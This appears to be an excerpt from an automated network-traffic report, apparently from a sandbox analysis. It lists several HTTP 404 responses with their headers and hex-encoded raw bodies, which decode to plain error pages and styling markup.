63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Thu, 02 May 2024 06:25:46 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 49fe8594-426a-4020-b242-df6d1a61a0d0x-runtime: 0.045185content-length: 18187connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 6be9d13a-2dba-46bd-9c19-b35affe7f6c0x-runtime: 0.029447content-length: 18207connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 7035b86c-7e22-43c3-90bb-e042de1a7097x-runtime: 0.025147content-length: 28287connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 06:26:05 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 06:26:08 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 06:26:11 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 